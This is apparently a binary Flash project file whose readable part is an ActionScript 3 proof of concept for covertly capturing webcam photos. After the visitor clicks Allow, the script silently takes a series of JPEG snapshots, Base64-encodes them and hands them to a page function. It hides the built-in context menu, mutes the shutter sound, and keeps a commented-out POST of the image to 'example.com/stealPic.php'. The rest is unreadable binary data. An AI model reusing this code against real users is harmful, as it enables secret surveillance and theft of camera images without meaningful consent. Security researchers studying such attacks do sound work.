CColorDef��������3�P��f�P�0���P�H���P�`���P�x�3���33�(��3f�<�0�3��C�H�3��F�`�3��H�x�f��0�f3��0�ff�(�0�f��5�H�f��<�`�f��@�x���333�0���3����33�x��f3�d�0��3�]�H��3�Z�`��3�X�x�33����333�0�3f3�PPH�3�3�Px`�3�3�P�x�3�3�P���f3���0�f33�PH�ff3�(PH�f�3�<x`�f�3�C�x�f�3�F�����fff�`���f���0�3f���0�ff�x�0��f�k�H��f�d�`��f�`�x�3f���0�33f��PH�3ff�xPH�3�f�dx`�3�f�]�x�3�f�Z���ff���0�f3f��PH�fff�`�f�f�P0x�f�f�Px��f�f�P�����������������H�3����H�f����H����x�H�̙�n�`����h�x�3����H�33���x`�3f���x`�3���xx`�3̙�k�x�3���d���f����H�f3���x`�ff���0x�f���x0x�f̙�dx��f���]�����������������`�3����`�f����`������`����x�`����p�x�3����`�33����x�3f����x�3�����x�3���x�x�3���n���f����`�f3����x�ff���x��f����x��f�����CPicPage��	CPicLayer��	CPicFrame��\@\@\�\�\@\������@�@���@�@�@\@\@�@\@\�\�����\������?������5�����������
capture_mc�����3���������?�����������//Coded by floyd @floyd_ch http://floyd.ch by using various code snippets for Actionscript3
import flash.display.Bitmap;
import flash.display.BitmapData;
import com.adobe.images.JPGEncoder;
import flash.external.ExternalInterface;
import com.foxarc.util.Base64;

stage.align = StageAlign.TOP_LEFT;
stage.scaleMode = StageScaleMode.NO_SCALE;

//what if user right clicks instead left as he should?
var rClickOptions:ContextMenu = new ContextMenu();
var pleaseLeftClick:ContextMenuItem = new ContextMenuItem("Please use a left click");
pleaseLeftClick.addEventListener(ContextMenuEvent.MENU_ITEM_SELECT, myLink );
pleaseLeftClick.separatorBefore = false;
rClickOptions.hideBuiltInItems();
rClickOptions.customItems.push(pleaseLeftClick);
this.contextMenu = rClickOptions;
function myLink(e:Event) {
	//Let's just do nothing when he clicks the pleaseLeftClick
	//navigateToURL(new URLRequest("http://www.example.com"), "_blank" );
}

//TODO: Remove later
//var snd:Sound = new camerasound();

var cam:Camera;
var video:Video;
var bitmapData:BitmapData;
var bitmap:Bitmap;
var no_of_pictures:int = 20;
var interval:int = 1000;
//Get FlashVar parameters
//no_of_pictures = int(root.loaderInfo.parameters.no_of_pictures);
//interval = int(root.loaderInfo.parameters.interval);

var params:Object = LoaderInfo(this.root.loaderInfo).parameters;
var no_of_pictures_string:String = String(params['no_of_pictures']);
var interval_string:String = String(params['interval']);

//ExternalInterface.call("alert", no_of_pictures_string);
//ExternalInterface.call("alert", interval_string);

no_of_pictures = int(no_of_pictures_string);
interval = int(interval_string);




//TODO: if user has more than one camera, access them all
if (Camera.names.length > 0){
	//trace("No of cameras: "+Camera.names.length);
	cam = Camera.getCamera();
	cam.setQuality(0, 100);//bandwith (zero for max), quality (0 to 100, 100 = highest quality)
	cam.setMode(320,320,30,false);//setMode([width:Number], [height:Number], [fps:Number], [favorArea:Boolean])
	cam.addEventListener(StatusEvent.STATUS, statusHandler);
	video = new Video();
	video.attachCamera(cam);//This is the call, where the Allow/Deny dialog pops up
}
else{
	ExternalInterface.call("noCamera"); 
}

function statusHandler(event:StatusEvent):void {
	switch (event.code) {
		case "Camera.Muted" :
			//trace("User clicked Deny.");
			//ExternalInterface.call("alert", "Hi, it's me, flash, alert worked. I will try to call the javascript pressedDisallow function now"); 
			ExternalInterface.call("pressedDisallow"); 
			break;
		case "Camera.Unmuted" :
			//trace("User clicked Accept.");
			//ExternalInterface.call("alert", "Hi, it's me, flash, alert worked. I will try to call the javascript pressedAllow function now");
			ExternalInterface.call("pressedAllow"); 
			//ExternalInterface.call("alert", "already called 'pressedAllow', but here's another alert from flash");
			prepare();
			break;
	}
}

function prepare():void {
	bitmapData = new BitmapData(video.width, video.height);
	bitmap = new Bitmap(bitmapData);
	for(var k:int=0; k<no_of_pictures; k++){
		
		setTimeout(takePicAndSend, k*interval);
	}
}

function takePicAndSend():void {
	//snd.play();
	bitmapData.draw(video);
	var myEncoder:JPGEncoder = new JPGEncoder(100);
	var byteArray:ByteArray = myEncoder.encode(bitmapData);

	//Problem: crossdomain.xml is requested
	/*var saveJPG:URLRequest = new URLRequest("http://www.example.com/stealPic.php"); 
	var header:URLRequestHeader = new URLRequestHeader("Content-type", "application/octet-stream");
	saveJPG.requestHeaders.push(header);
	saveJPG.method = URLRequestMethod.POST;
	saveJPG.data = byteArray; 
	*/

	//Problem: opens a new windows, even with "_self"
	/*var saveJPG:URLRequest = new URLRequest("javascript:alert(123)", "_self");
	navigateToURL(saveJPG);
	*/

	//Works!
	var encodedPic:String = Base64.encode(byteArray);
	//trace(encodedPic);
	//trace("took pic");
	var result:Object = ExternalInterface.call("pictureCallback", encodedPic); 

}
��������as����O�O���aveJPG);
	*/

	//Works!
	var encodedPic:String = Base64.encode(byteArray);
	//trace(encodedPic);
	//trace("took pic");
	var result:Object = ExternalInterface.call("pictureCallback", encodedPic); 

}
��������as����O�O���C��
CDocumentPageP 1 1249336686���Scene 1���n]wJd����������������������
#�O�������������������������������������������������������������������CMediaSoundM 3 1249402809���camera sound.mp3���.\camera sound.mp3�_xJ�_xJ���������camerasound�������������
.c�#`���pp��hhhh������������legacyLineSpacing���0����!PublishGifProperties::PaletteName������ PublishRNWKProperties::speed256K���0���Vector::AS3 Package Paths���.���"PublishHtmlProperties::StartPaused���0���%PublishFormatProperties::htmlFileName���take_picture.html��� PublishQTProperties::LayerOption������ PublishQTProperties::AlphaOption������"PublishQTProperties::MatchMovieDim���1���Vector::UseNetwork���0���Vector::Debugging Permitted���0���PublishProfileProperties::name���Default���PublishHtmlProperties::Loop���1���PublishFormatProperties::jpeg���0���PublishQTProperties::Width���550���$PublishPNGProperties::OptimizeColors���1���&PublishRNWKProperties::speedSingleISDN���0���&PublishRNWKProperties::singleRateAudio���0���Vector::DocumentClass������Vector::External Player������%PublishHtmlProperties::showTagWarnMsg���1���'PublishHtmlProperties::DeblockingFilter���0���PublishHtmlProperties::Units���0���4PublishHtmlProperties::UsingDefaultAlternateFilename���1���PublishGifProperties::Smooth���1���%PublishRNWKProperties::mediaCopyright���(c) 2000���#PublishRNWKProperties::flashBitRate���1200���Vector::ScriptStuckDelay���15���Vector::Compress Movie���1���Vector::Package Paths������&PublishFormatProperties::flashFileName���take_picture.swf���'PublishFormatProperties::gifDefaultName���1���%PublishFormatProperties::projectorMac���0���"PublishGifProperties::DitherOption������!PublishRNWKProperties::exportSMIL���1��� PublishRNWKProperties::speed384K���0���"PublishRNWKProperties::exportAudio���1���Vector::AS3ExportFrame���1���Vector::Invisible Layer���1���PublishHtmlProperties::Quality���4���(PublishHtmlProperties::VerticalAlignment���1���$PublishFormatProperties::pngFileName���take_picture.png���PublishFormatProperties::html���1���"PublishPNGProperties::FilterOption������'PublishRNWKProperties::mediaDescription������Vector::Override Sounds���0���!PublishHtmlProperties::DeviceFont���0���-PublishFormatProperties::generatorDefaultName���1���PublishQTProperties::Flatten���1���PublishPNGProperties::BitDepth���24-bit with Alpha���PublishPNGProperties::Smooth���1���"PublishGifProperties::DitherSolids���0���PublishGifProperties::Interlace���0���PublishJpegProperties::DPI���4718592���Vector::Quality���80���Vector::Protect���0���"PublishHtmlProperties::DisplayMenu���1���*PublishHtmlProperties::HorizontalAlignment���1���2PublishHtmlProperties::VersionDetectionIfAvailable���0���Vector::Template���0���*PublishFormatProperties::generatorFileName���take_picture.swt���(PublishFormatProperties::rnwkDefaultName���1���(PublishFormatProperties::jpegDefaultName���1���PublishFormatProperties::gif���0���PublishGifProperties::Loop���1���PublishGifProperties::Width���700���$PublishRNWKProperties::mediaKeywords������!PublishRNWKProperties::mediaTitle������PublishRNWKProperties::speed28K���1���#PublishFormatProperties::qtFileName���take_picture.mov���"PublishPNGProperties::DitherOption������#PublishGifProperties::PaletteOption������#PublishGifProperties::MatchMovieDim���1���$PublishRNWKProperties::speedDualISDN���0���$PublishRNWKProperties::realVideoRate���100000���PublishJpegProperties::Quality���80���Vector::IncludeXMP���1���PublishFormatProperties::flash���1���#PublishPNGProperties::PaletteOption������#PublishPNGProperties::MatchMovieDim���1���$PublishJpegProperties::MatchMovieDim���1���Vector::Package Export Frame���1���!PublishProfileProperties::version���1���PublishHtmlProperties::Align���0���-PublishFormatProperties::projectorWinFileName���take_picture.exe���'PublishFormatProperties::pngDefaultName���1���0PublishFormatProperties::projectorMacDefaultName���1���#PublishQTProperties::PlayEveryFrame���0���"PublishPNGProperties::DitherSolids���0���"PublishJpegProperties::Progressive���0���Vector::Export Swc���0���Vector::Debugging Password������Vector::Omit Trace Actions���0���PublishHtmlProperties::Height���400���PublishHtmlProperties::Width���700���%PublishFormatProperties::jpegFileName���take_picture.jpg���)PublishFormatProperties::flashDefaultName���1���PublishPNGProperties::Interlace���0���PublishGifProperties::Height���400���PublishJpegProperties::Size���0���Vector::UseAS3Namespace���1���Vector::AS3AutoDeclare���1���Vector::AS3Coach���1���Vector::DeviceSound���0���'PublishHtmlProperties::TemplateFileName���vC:\Documents and Settings\vamapaull\Local Settings\Application Data\Adobe\Flash CS4\en\Configuration\HTML\Default.html���!PublishHtmlProperties::WindowMode���0���2PublishHtmlProperties::UsingDefaultContentFilename���1���-PublishFormatProperties::projectorMacFileName���take_picture.app���(PublishFormatProperties::htmlDefaultName���1���PublishFormatProperties::rnwk���0���PublishFormatProperties::png���0���PublishQTProperties::Height���400���%PublishPNGProperties::RemoveGradients���0���PublishGifProperties::MaxColors���255���'PublishGifProperties::TransparentOption������PublishGifProperties::LoopCount������PublishRNWKProperties::speed56K���1���Vector::Report���0���+PublishHtmlProperties::OwnAlternateFilename������(PublishHtmlProperties::AlternateFilename���take_picture_alternate.html���&PublishHtmlProperties::ContentFilename���take_picture_content.html���"PublishFormatProperties::generator���0���$PublishGifProperties::OptimizeColors���1���"PublishRNWKProperties::audioFormat���0���Vector::HardwareAcceleration���0���Vector::AS3Strict���1���Vector::Version���9���Vector::Event Format���0���Vector::Stream Compress���7���PublishFormatProperties::qt���0���PublishPNGProperties::Height���400���PublishPNGProperties::Width���700���%PublishGifProperties::RemoveGradients���0��� PublishRNWKProperties::speed512K���0���PublishJpegProperties::Height���400���Vector::EventUse8kSampleRate���0���Vector::StreamUse8kSampleRate���0���Vector::ActionScriptVersion���3���Vector::Event Compress���7���PublishHtmlProperties::Scale���0���0PublishFormatProperties::projectorWinDefaultName���1���PublishQTProperties::Looping���0���*PublishQTProperties::UseQTSoundCompression���0���!PublishPNGProperties::PaletteName������!PublishPNGProperties::Transparent���0���&PublishGifProperties::TransparentAlpha���128���PublishGifProperties::Animated���0���"PublishRNWKProperties::mediaAuthor������(PublishRNWKProperties::speedCorporateLAN���0���&PublishRNWKProperties::showBitrateDlog���1���"PublishRNWKProperties::exportFlash���1���PublishJpegProperties::Width���700���Vector::Stream Format���0���Vector::DeblockingFilter���0���"PublishHtmlProperties::VersionInfo���Y10,0,2,0;9,0,124,0;8,0,24,0;7,0,14,0;6,0,79,0;5,0,58,0;4,0,32,0;3,0,8,0;2,0,1,12;1,0,0,1;���$PublishFormatProperties::gifFileName���take_picture.gif���&PublishFormatProperties::qtDefaultName���1���"PublishQTProperties::PausedAtStart���0���%PublishQTProperties::ControllerOption���0���PublishPNGProperties::MaxColors���255���,PublishHtmlProperties::UsingOwnAlternateFile���0���%PublishFormatProperties::rnwkFileName���take_picture.smil���%PublishFormatProperties::projectorWin���0���%PublishFormatProperties::defaultNames���1�������������	CColorDef��������3�P��f�P�0���P�H���P�`���P�x�3���33�(��3f�<�0�3��C�H�3��F�`�3��H�x�f��0�f3��0�ff�(�0�f��5�H�f��<�`�f��@�x���333�0���3����33�x��f3�d�0��3�]�H��3�Z�`��3�X�x�33����333�0�3f3�PPH�3�3�Px`�3�3�P�x�3�3�P���f3���0�f33�PH�ff3�(PH�f�3�<x`�f�3�C�x�f�3�F�����fff�`���f���0�3f���0�ff�x�0��f�k�H��f�d�`��f�`�x�3f���0�33f��PH�3ff�xPH�3�f�dx`�3�f�]�x�3�f�Z���ff���0�f3f��PH�fff�`�f�f�P0x�f�f�Px��f�f�P�����������������H�3����H�f����H����x�H�̙�n�`����h�x�3����H�33���x`�3f���x`�3���xx`�3̙�k�x�3���d���f����H�f3���x`�ff���0x�f���x0x�f̙�dx��f���]�����������������`�3����`�f����`������`����x�`����p�x�3����`�33����x�3f����x�3�����x�3���x�x�3���n���f����`�f3����x�ff���x��f����x��f���xx��f���k�����������������x�3����x�f����x������x������x����x�x�3����x�33������3f������3�������3�������3���x���f����x�f3������ff������f�������f�������f���x��������x������H��3�
�H��f��H����(�H����2�`����8�x����`��3�
�`��f�xx��f���k�����������������x�3����x�f����x������x������x����x�x�3����x�33������3f������3�������3�������3���x���f����x�f3������ff������f�������f�������f���x��������x������H��3�
�H��f��H����(�H����2�`����8�x����`��3�
�`��f��`�̙��`����(�`����0�x����x��3��x��f��x�����x���� �x����(�x�����P�x����3���H��33�x`��f3�x`���3�(x`���3�5�x���3�<����3���`��33��x��f3�
�x�̙3��x���3�(�x���3�2����3���x��33�����f3�
�����3������3������3�(���������x����f����`�̙��`����(�`����0�x����x��3��x��f��x�����x���� �x����(�x�����P�x����3���H��33�x`��f3�x`���3�(x`���3�5�x���3�<����3���`��33��x��f3�
�x�̙3��x���3�(�x���3�2����3���x��33�����f3�
�����3������3������3�(���������x����f���H��3f��x`��ff�0x���f�(0x���f�<x����f�C����f���`��3f���x��ff�x��̙f�x����f�(x����f�5����f���x��3f������ff������f�
�����f������f�(��������(�x��������H��3���x`��f���0x��������̙�PP������P��������`��3����x��f���x��̙��P���̙�(P������<��������x��3�����H��3f��x`��ff�0x���f�(0x���f�<x����f�C����f���`��3f���x��ff�x��̙f�x����f�(x����f�5����f���x��3f������ff������f�
�����f������f�(��������(�x��������H��3���x`��f���0x��������̙�PP������P��������`��3����x��f���x��̙��P���̙�(P������<��������x��3�������f��������������̙��������(��������x�x��������`��3����x��f���x�������P������xP������d��������`��3����x��f���x��̙���P������������P��������x��3�������f�������������������������(����������x��������x��3�������f��������������������������x�����f��������������̙��������(��������x�x��������`��3����x��f���x�������P������xP������d��������`��3����x��f���x��̙���P������������P��������x��3�������f�������������������������(����������x��������x��3�������f��������������������������x��������x��3�������f������̙������������������x��������x��3�������f��������������������������������������������������������������������x��3�������f������̙������������������x��������x��3�������f���������������������������������������������������������������f��`����z������f��������������*���]������������������z���"PublishQTProperties::QTSndSettings��CQTAudioSettingsX����������������������������������	�DSaved by Adobe Flash Mac Intel 9.0 build 494 timecount = 1338905851f��`����z������f��������������*���]������������������z���"PublishQTProperties::QTSndSettings��CQTAudioSettingsX����������������������������������	�DSaved by Adobe Flash Mac Intel 9.0 build 494 timecount = 1338911249H��3f��x`��ff�0x���f�(0x���f�<x����f�C����f���`��3f���x��ff�x��̙f�x����f�(x����f�5����f���x��3f������ff������f�
�����f������f�(��������(�x��������H��3���x`��f���0x��������̙�PP������P��������`��3����x��f���x��̙��P���̙�(P������<��������x��3�������f��������������̙��������(��������x�x��������`��3����x��f���x�������P������xP������d��������`��3����x��f���x��̙���P������������P��������x��3�������f�������������������������(����������x��������x��3�������f��������������������������x��������x��3�������f������̙������������������x��������x��3�������f���������������������������������������������������������������f��`����z������f��������������*���]������������������z���"PublishQTProperties::QTSndSettings��CQTAudioSettingsX�������������������������������������	�DSaved by Adobe Flash Mac Intel 9.0 build 494 timecount = 1337619290s::speed56K���1���PublishGifProperties::LoopCount������'PublishGifProperties::TransparentOption������PublishGifProperties::MaxColors���255���%PublishPNGProperties::RemoveGradients���0���PublishQTProperties::Height���400���PublishFormatProperties::qt���0���Vector::Stream Compress���7���Vector::Event Format���0���Vector::Version���9���Vector::AS3Strict���1���Vector::HardwareAcceleration���0���"PublishRNWKProperties::audioFormat���0���$PublishGifProperties::OptimizeColors���1���0PublishFormatProperties::projectorWinDefaultName���1���PublishHtmlProperties::Scale���0���Vector::Event Compress���7���Vector::ActionScriptVersion���3���Vector::StreamUse8kSampleRate���0���Vector::EventUse8kSampleRate���0���PublishJpegProperties::Height���400��� PublishRNWKProperties::speed512K���0���%PublishGifProperties::RemoveGradients���0���PublishPNGProperties::Width���700���PublishPNGProperties::Height���400���&PublishFormatProperties::qtDefaultName���1���$PublishFormatProperties::gifFileName���take_picture.gif���"PublishHtmlProperties::VersionInfo���Y10,0,2,0;9,0,124,0;8,0,24,0;7,0,14,0;6,0,79,0;5,0,58,0;4,0,32,0;3,0,8,0;2,0,1,12;1,0,0,1;���Vector::DeblockingFilter���0���Vector::Stream Format���0���PublishJpegProperties::Width���700���"PublishRNWKProperties::exportFlash���1���&PublishRNWKProperties::showBitrateDlog���1���(PublishRNWKProperties::speedCorporateLAN���0���"PublishRNWKProperties::mediaAuthor������PublishGifProperties::Animated���0���&PublishGifProperties::TransparentAlpha���128���!PublishPNGProperties::Transparent���0���!PublishPNGProperties::PaletteName������*PublishQTProperties::UseQTSoundCompression���0���PublishQTProperties::Looping���0���%PublishFormatProperties::defaultNames���1���%PublishFormatProperties::projectorWin���0���%PublishFormatProperties::rnwkFileName���take_picture.smil���,PublishHtmlProperties::UsingOwnAlternateFile���0���PublishPNGProperties::MaxColors���255���%PublishQTProperties::ControllerOption���0���"PublishQTProperties::PausedAtStart���0�������������	CColorDef��������3�P��f�P�0���P�H���P�`���P�x�3���33�(��3f�<�0�3��C�H�3��F�`�3��H�x�f��0�f3��0�ff�(�0�f��5�H�f��<�`�f��@�x���333�0���3����33�x��f3�d�0��3�]�H��3�Z�`��3�X�x�33����333�0�3f3�PPH�3�3�Px`�3�3�P�x�3�3�P���f3���0�f33�PH�ff3�(PH�f�3�<x`�f�3�C�x�f�3�F�����fff�`���f���0�3f���0�ff�x�0��f�k�H��f�d�`��f�`�x�3f���0�33f��PH�3ff�xPH�3�f�dx`�3�f�]�x�3�f�Z���ff���0�f3f��PH�fff�`�f�f�P0x�f�f�Px��f�f�P�����������������H�3����H�f����H����x�H�̙�n�`����h�x�3����H�33���x`�3f���x`�3���xx`�3̙�k�x�3���d���f����H�f3���x`�ff���0x�f���x0x�f̙�dx��f���]�����������������`�3����`�f����`������`����x�`����p�x�3����`�33����x�3f����x�3�����x�3���x�x�3���n���f����`�f3����x�ff���x��f����x��f���xx��f���k�����������������x�3����x�f����x������x������x����x�x�3����x�33������3f������3�������3�������3���x���f����x�f3������ff������f�������f�������f���x��������x������H��3�
�H��f��H����(�H����2�`����8�x����`��3�
�`��f��`�̙��`����(�`����0�x����x��3��x��f��x�����x���� �x����(�x�����P�x����3���H��33�x`��f3�x`���3�(x`���3�5�x���3�<����3���`��33��x��f3�
�x�̙3��x���3�(�x���3�2����3���x��33�����f3�
�����3������3������3�(���������x����f���H��3f��x`��ff�0x���f�(0x���f�<x����f�C����f���`��3f���x��ff�x��̙f�x����f�(x����f�5����f���x��3f������ff������f�
�����f������f�(��������(�x��������H��3���x`��f���0x��������̙�PP������P��������`��3����x��f���x��̙��P���̙�(P������<��������x��3�������f��������������̙��������(��������x�x��������`��3����x��f���x�������P������xP������d��������`��3����x��f���x��̙���P������������P��������x��3�������f�������������������������(����������x��������x��3�������f��������������������������x��������x��3�������f������̙������������������x��������x��3�������f���������������������������������������������������������������f��`����z������f��������������*���]������������������z���"PublishQTProperties::QTSndSettings��CQTAudioSettingsX�������������������������������������	�DSaved by Adobe Flash Mac Intel 9.0 build 494 timecount = 1337619026f��`����z������f��������������*���]������������������z���"PublishQTProperties::QTSndSettings��CQTAudioSettingsX�������������������������������������	�DSaved by Adobe Flash Mac Intel 9.0 build 494 timecount = 1337619018f��`����z������f��������������*���]������������������z���"PublishQTProperties::QTSndSettings��CQTAudioSettingsX�������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
���� ����"#$%&'()*+,-./01234����6789:;<=����?@ABCD������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������	
